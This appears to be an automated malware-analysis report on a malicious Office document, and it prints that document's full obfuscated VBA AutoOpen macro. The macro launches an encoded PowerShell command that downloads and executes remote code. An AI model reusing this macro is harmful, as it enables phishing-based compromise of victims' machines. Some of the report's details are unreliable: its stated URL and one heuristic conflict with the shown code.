MALICIOUS (Risk Score: 210)

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. Its AutoOpen macro reassembles an obfuscated, base64-encoded PowerShell command from dozens of short string literals and launches it through Shell$ with the -e (encoded command) switch. Specifically, it reconstructs the command 'Invoke-webrequest https://uspra5140.com/a', which is likely used to download and execute a second-stage payload. Obfuscated PowerShell launched from an AutoOpen macro is a common technique for initial compromise via malicious documents.
Heuristics (7)

- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code

- Potential Shell call in VBA [critical] OLE_VBA_SHELL: Potential Shell call in VBA
  Matched lines in script:
    FQ_MJ = FS_KF & " -e " & BK_ND
    Shell$ FQ_MJ
    End Sub

- Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  Matched lines in script:
    FQ_MJ = FS_KF & " -e " & BK_ND
    Shell$ FQ_MJ
    End Sub

- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro
  Matched lines in script:
    Attribute VB_Name = "StockUpdate"
    Sub AutoOpen()
    Dim CL_MD As String

- Reference to PowerShell [high] SC_STR_POWERSHELL: Reference to PowerShell

- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5177 bytes |

SHA-256: b841dff21c3a6df34059fa81d11530bbdd30fe30daaf9bef61d6a8b842dde4e2

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "StockUpdate"
Sub AutoOpen()
Dim CL_MD As String
CL_MD = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoAC"
Dim AK_KG As String
AK_KG = "QAeAApAHsAcgBlAHQAdQBy"
Dim IO_SE As String
IO_SE = "AG4AIABbAFMAeQBzA"
Dim IT_RF As String
IT_RF = "HQAZQBtAC4AVABlAHgAdAAuAEUA"
Dim FT_KB As String
FT_KB = "bgBjAG8AZABpAG4AZwBdADoAOgBVAFQA"
BK_ND = BK_ND & CL_MD & AK_KG & IO_SE & IT_RF & FT_KB
Dim JK_KC As String
JK_KC = "RgA4AC4ARw"
Dim IQ_TG As String
IQ_TG = "BlAHQAUwB0AHIAaQBuAGcAKAB"
Dim IK_KG As String
IK_KG = "bAFMAeQ"
Dim HL_RJ As String
HL_RJ = "BzAHQAZQBtAC4AQwBvAG4AdgBlA"
Dim AK_NF As String
AK_NF = "HIAdABdADoAOgBGAHIAbwBtAEIAYQBzA"
BK_ND = BK_ND & JK_KC & IQ_TG & IK_KG & HL_RJ & AK_NF
Dim CT_RD As String
CT_RD = "GUANgA0AF"
Dim BQ_PD As String
BQ_PD = "MAdAByAGkA"
Dim IK_RF As String
IK_RF = "bgBnACgA"
Dim ER_RB As String
ER_RB = "JAB4ACkAKQB9ADsAaQBlAHg"
Dim BL_KD As String
BL_KD = "AIAAkACgAY"
BK_ND = BK_ND & CT_RD & BQ_PD & IK_RF & ER_RB & BL_KD
Dim AL_RJ As String
AL_RJ = "QAgACQAKAAkACgAJAAoAGkAbgB2"
Dim AK_TH As String
AK_TH = "AG8AawBlAC0AdwBlAGIA"
Dim GT_RJ As String
GT_RJ = "cgBlAHEAdQBlAHMAdAAgACcAaAB0AHQ"
Dim EK_QF As String
EK_QF = "AcABzADoALwAvAHUA"
Dim AQ_QE As String
AQ_QE = "cwBwAHIAZAA1ADEANQAwAG"
BK_ND = BK_ND & AL_RJ & AK_TH & GT_RJ & EK_QF & AQ_QE
Dim FN_RD As String
FN_RD = "MAZQBuAH"
Dim CQ_MI As String
CQ_MI = "QAcgBhAG"
Dim HL_KG As String
HL_KG = "wALgB0AGEAYgBsAGUALgBjAG8AcgB"
Dim HO_SA As String
HO_SA = "lAC4AdwBpAG4AZABvAHcAcwAuAG4A"
Dim IL_RA As String
IL_RA = "ZQB0AC8AdwBhAHIAZQBoAG8"
BK_ND = BK_ND & FN_RD & CQ_MI & HL_KG & HO_SA & IL_RA
Dim EM_LG As String
EM_LG = "AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD"
Dim BN_RB As String
BN_RB = "0AUABhAHIAdA"
Dim BS_LF As String
BS_LF = "BpAHQAaQBvAG"
Dim AL_PB As String
AL_PB = "4ASwBlAHkAJQAyADAAZQBxACUAMgAwAC"
Dim IK_PH As String
IK_PH = "UAMgA3AHMAdAB"
BK_ND = BK_ND & EM_LG & BN_RB & BS_LF & AL_PB & IK_PH
Dim GP_OJ As String
GP_OJ = "hAGcAZQAlADIANw"
Dim IS_LJ As String
IS_LJ = "AmACQAUwBlAGwAZQBjAHQAPQBkAGEAdA"
Dim JK_SF As String
JK_SF = "BhACYAcwB2AD0AMgAwADEANwAtADAANAAtA"
Dim BN_QA As String
BN_QA = "DEANwAmAHMAcwA9AGI"
Dim BL_LC As String
BL_LC = "AZgBxAHQAJgBz"
BK_ND = BK_ND & GP_OJ & IS_LJ & JK_SF & BN_QA & BL_LC
Dim CQ_SC As String
CQ_SC = "AHIAdAA"
Dim EM_QJ As String
EM_QJ = "9AHMAYwBvACYAcwBwAD0Ac"
Dim EQ_SJ As String
EQ_SJ = "gB3AGQAbABhAGMAdQBwACYAcwBlAD0"
Dim IP_OI As String
IP_OI = "AMgAwADEANwAtADEAMA"
Dim HN_PF As String
HN_PF = "AtADAANgB"
BK_ND = BK_ND & CQ_SC & EM_QJ & EQ_SJ & IP_OI & HN_PF
Dim CP_OI As String
CP_OI = "UADIAMgA6ADQAMQA6"
Dim HM_NB As String
HM_NB = "ADEAMgBaAC"
Dim BK_PG As String
BK_PG = "YAcwB0AD0AMgAwADEANwAtADAAOQAtADI"
Dim AP_MA As String
AP_MA = "AOABUADE"
Dim GO_NE As String
GO_NE = "ANAA6ADQAM"
BK_ND = BK_ND & CP_OI & HM_NB & BK_PG & AP_MA & GO_NE
Dim EK_NE As String
EK_NE = "QA6ADEA"
Dim AM_ME As String
AM_ME = "MgBaACYAcwBwAHIAPQ"
Dim GK_PI As String
GK_PI = "BoAHQAdABwAHMAJgBzAGkAZwA9AHQAe"
Dim DQ_PG As String
DQ_PG = "gBQADcAY"
Dim IL_NJ As String
IL_NJ = "wA4AHgAWgBoAHIAMQBzAGIAdgB4AD"
BK_ND = BK_ND & EK_NE & AM_ME & GK_PI & DQ_PG & IL_NJ
Dim BO_KB As String
BO_KB = "kAZgBKAFMAdwBK"
Dim JQ_MH As String
JQ_MH = "AEkAUwBIAEIANgB"
Dim ET_KF As String
ET_KF = "lADgAJQAyAEIAbgBs"
Dim HS_RC As String
HS_RC = "AGwAdQBuAEgAaQBmAEwAMwBoAHgA"
Dim HS_QE As String
HS_QE = "agA0ACUAMwBEACcAIAAtAEgAZQBhAG"
BK_ND = BK_ND & BO_KB & JQ_MH & ET_KF & HS_RC & HS_QE
Dim FK_TE As String
FK_TE = "QAZQByAHMAIABAAHsAJwBBAGMAYwBlAH"
Dim JT_KI As String
JT_KI = "AAdAAnAD0AJwBBAHAAcABsAGkAYwBh"
Dim AQ_OB As String
AQ_OB = "AHQAaQBvA"
Dim DO_OD As String
DO_OD = "G4ALwBKAFMATwBOACcAfQApAC4AQwBvAG4A"
Dim EN_NB As String
EN_NB = "dABlAG4AdAAgAHwAIABD"
BK_ND = BK_ND & FK_TE & JT_KI & AQ_OB & DO_OD & EN_NB
Dim HT_KI As String
HT_KI = "AG8AbgB2AGUAcgB0AEYAcgBvAG"
Dim IN_KF As String
IN_KF = "0ALQBKAHMAbwBuACkALgB2AGEAbAB1AGU"
BK_ND = BK_ND & HT_KI & IN_KF
Dim EP_SE As String
EP_SE = "ALgBkAGEAdABh"
BK_ND = BK_ND & EP_SE
Dim IM_LJ As String
IM_LJ = "ACkAKQA="
BK_ND = BK_ND & IM_LJ
FS_KF = "p" + "O" + "w" + "E" + "r" + "S" + "h" + "E" + "l" + "L"
FQ_MJ = FS_KF & " -e " & BK_ND
Shell$ FQ_MJ
End Sub